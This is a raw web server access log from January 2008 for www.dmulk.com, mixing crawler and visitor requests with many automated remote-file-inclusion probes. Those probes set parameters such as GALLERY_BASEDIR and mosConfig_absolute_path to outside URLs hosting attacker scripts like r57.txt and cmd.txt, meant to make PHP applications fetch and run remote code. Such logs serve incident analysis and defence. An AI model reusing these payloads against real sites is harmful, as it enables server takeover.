208.110.73.18 - - [06/Jan/2008:08:59:13 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://vass0ra.110mb.com/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.110.73.18 - - [06/Jan/2008:08:59:13 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://vass0ra.110mb.com/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.28.224 - - [06/Jan/2008:09:00:33 -0800] "GET /index.php?option=com_admin-copy_module&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.214.28.224 - - [06/Jan/2008:09:00:33 -0800] "GET /logs/index.php?option=com_admin-copy_module&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
82.100.220.33 - - [06/Jan/2008:09:03:05 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.33 - - [06/Jan/2008:09:03:05 -0800] "GET //login.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.33 - - [06/Jan/2008:09:03:05 -0800] "GET /logs//login.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.55.237.185 - - [06/Jan/2008:09:05:34 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://r5f5i5.nm.ru/tool/666.tester? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
88.55.237.185 - - [06/Jan/2008:09:05:34 -0800] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://r5f5i5.nm.ru/tool/666.tester? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
64.38.11.122 - - [06/Jan/2008:09:08:21 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.38.11.122 - - [06/Jan/2008:09:08:21 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.50.14.189 - - [06/Jan/2008:09:09:37 -0800] "GET /logs/access_071220.log//convert/mvcw_conver.php?step=1&vwar_root=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [06/Jan/2008:09:09:37 -0800] "GET /logs/access_071214.log//convert/mvcw_conver.php?step=1&vwar_root=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.98.97 - - [06/Jan/2008:09:11:21 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.strictly-tango.dk/css/pictures/Logo-banner-2%20copy.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [06/Jan/2008:09:11:22 -0800] "GET //login.php?dir=http://www.strictly-tango.dk/css/pictures/Logo-banner-2%20copy.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [06/Jan/2008:09:11:24 -0800] "GET /logs//login.php?dir=http://www.strictly-tango.dk/css/pictures/Logo-banner-2%20copy.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:09:11:26 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.226.14 - - [06/Jan/2008:09:12:39 -0800] "GET /logs/index.php?p=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.72.117.141 - - [06/Jan/2008:09:12:40 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
58.120.226.14 - - [06/Jan/2008:09:12:40 -0800] "GET /index.php?p=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.72.117.141 - - [06/Jan/2008:09:12:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
77.188.146.212 - - [06/Jan/2008:09:12:56 -0800] "GET /funny/ HTTP/1.1" 200 808 "http://www.google.com/search?q=funny+index+of&hl=en&safe=off&client=firefox-a&rls=org.mozilla:en-GB:official&start=30&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
77.188.146.212 - - [06/Jan/2008:09:12:58 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:09:12:59 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:09:12:59 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
62.48.192.42 - - [06/Jan/2008:09:13:28 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.48.192.42 - - [06/Jan/2008:09:13:33 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.48.192.42 - - [06/Jan/2008:09:13:42 -0800] "GET /logs/access_071222.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.179.215 - - [06/Jan/2008:09:15:45 -0800] "GET /logs/access_070912.log HTTP/1.0" 200 65147 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.227 - - [06/Jan/2008:09:17:41 -0800] "GET /logs/access_071201.log HTTP/1.0" 200 44753 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:09:18:43 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:09:18:43 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.208.99.103 - - [06/Jan/2008:09:18:44 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.99.103 - - [06/Jan/2008:09:18:44 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.99.103 - - [06/Jan/2008:09:18:44 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.125 - - [06/Jan/2008:09:21:00 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:09:23:43 -0800] "GET /index.php?redir=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:09:23:43 -0800] "GET /logs/index.php?redir=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
83.16.96.219 - - [06/Jan/2008:09:26:33 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://89.106.23.150:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
83.16.96.219 - - [06/Jan/2008:09:26:33 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://89.106.23.150:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
83.16.96.219 - - [06/Jan/2008:09:26:33 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://89.106.23.150:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
83.16.96.219 - - [06/Jan/2008:09:26:34 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://89.106.23.150:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
86.109.98.97 - - [06/Jan/2008:09:27:12 -0800] "GET //login.php?dir=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.241 - - [06/Jan/2008:09:33:09 -0800] "GET /minamijewelry/html/images/bird_character.jpg HTTP/1.1" 200 2668 "-" "Googlebot-Image/1.0" "www.dmulk.com"
201.236.111.227 - - [06/Jan/2008:09:34:33 -0800] "GET /logs/access_071205.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.85.86.6 - - [06/Jan/2008:09:37:04 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.85.86.6 - - [06/Jan/2008:09:37:05 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.85.86.6 - - [06/Jan/2008:09:37:05 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.85.86.6 - - [06/Jan/2008:09:37:06 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.85.86.6 - - [06/Jan/2008:09:37:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.85.86.6 - - [06/Jan/2008:09:37:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.35 - - [06/Jan/2008:09:37:11 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.15 - - [06/Jan/2008:09:37:11 -0800] "GET /bikes/dteel/WeSTOC07/?N=D HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.145 - - [06/Jan/2008:09:37:11 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.48.192.42 - - [06/Jan/2008:09:37:14 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.48.192.42 - - [06/Jan/2008:09:37:18 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.48.192.42 - - [06/Jan/2008:09:37:32 -0800] "GET /logs/access_071229.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.236.111.227 - - [06/Jan/2008:09:38:45 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.235 - - [06/Jan/2008:09:39:21 -0800] "GET /bikes/CreSTOC07/?S=D HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.191.78.197 - - [06/Jan/2008:09:40:06 -0800] "GET /logs//errors.php?error=http://dd3str0y3r.110mb.com/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
64.191.78.197 - - [06/Jan/2008:09:40:06 -0800] "GET //errors.php?error=http://dd3str0y3r.110mb.com/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
64.191.78.197 - - [06/Jan/2008:09:43:18 -0800] "GET /logs/access_071229.log//errors.php?error=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [06/Jan/2008:09:43:18 -0800] "GET //errors.php?error=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [06/Jan/2008:09:43:18 -0800] "GET /logs//errors.php?error=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:09:43:31 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:09:43:31 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:09:43:32 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:09:43:32 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:09:43:33 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
74.52.114.58 - - [06/Jan/2008:09:45:19 -0800] "GET //ws/get_events.php?includedir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:09:45:29 -0800] "GET /minamijewelry/dream.psd HTTP/1.0" 200 109304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:09:52:09 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:09:52:09 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
86.58.154.237 - - [06/Jan/2008:09:52:20 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [06/Jan/2008:09:52:20 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [06/Jan/2008:09:52:21 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.20.209 - - [06/Jan/2008:09:52:45 -0800] "GET /logs/access_071029.log HTTP/1.0" 200 21268 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.114.58 - - [06/Jan/2008:09:56:52 -0800] "GET /logs/access_071224.log//ws/get_events.php?includedir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [06/Jan/2008:09:56:52 -0800] "GET /logs//ws/get_events.php?includedir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.164 - - [06/Jan/2008:09:57:11 -0800] "GET /minamijewelry/?S=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.28.224 - - [06/Jan/2008:09:58:55 -0800] "GET /index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.28.224 - - [06/Jan/2008:09:58:55 -0800] "GET /logs/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
74.52.114.58 - - [06/Jan/2008:09:58:59 -0800] "GET /logs/access_071229.log//ws/get_events.php?includedir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:00:46 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:00:46 -0800] "GET /logs/access_071229.log//login.php?dir=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:00:46 -0800] "GET //login.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:00:47 -0800] "GET //login.php?dir=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:00:47 -0800] "GET /logs//login.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:00:48 -0800] "GET /logs//login.php?dir=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:10:00:57 -0800] "GET /minamijewelry/html/flower.html HTTP/1.0" 200 20957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:02:40 -0800] "GET /logs/access_071224.log//login.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:02:40 -0800] "GET /logs/access_071224.log//login.php?dir=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.15 - - [06/Jan/2008:10:02:50 -0800] "GET /logs/access_070705.log HTTP/1.0" 200 50888 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:15 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 200 913443 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:15 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 200 927196 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:16 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 200 828304 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:16 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:16 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:43 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000046.jpg HTTP/1.1" 200 773445 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:43 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000214.jpg HTTP/1.1" 200 713890 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:43 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000270.jpg HTTP/1.1" 200 706210 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
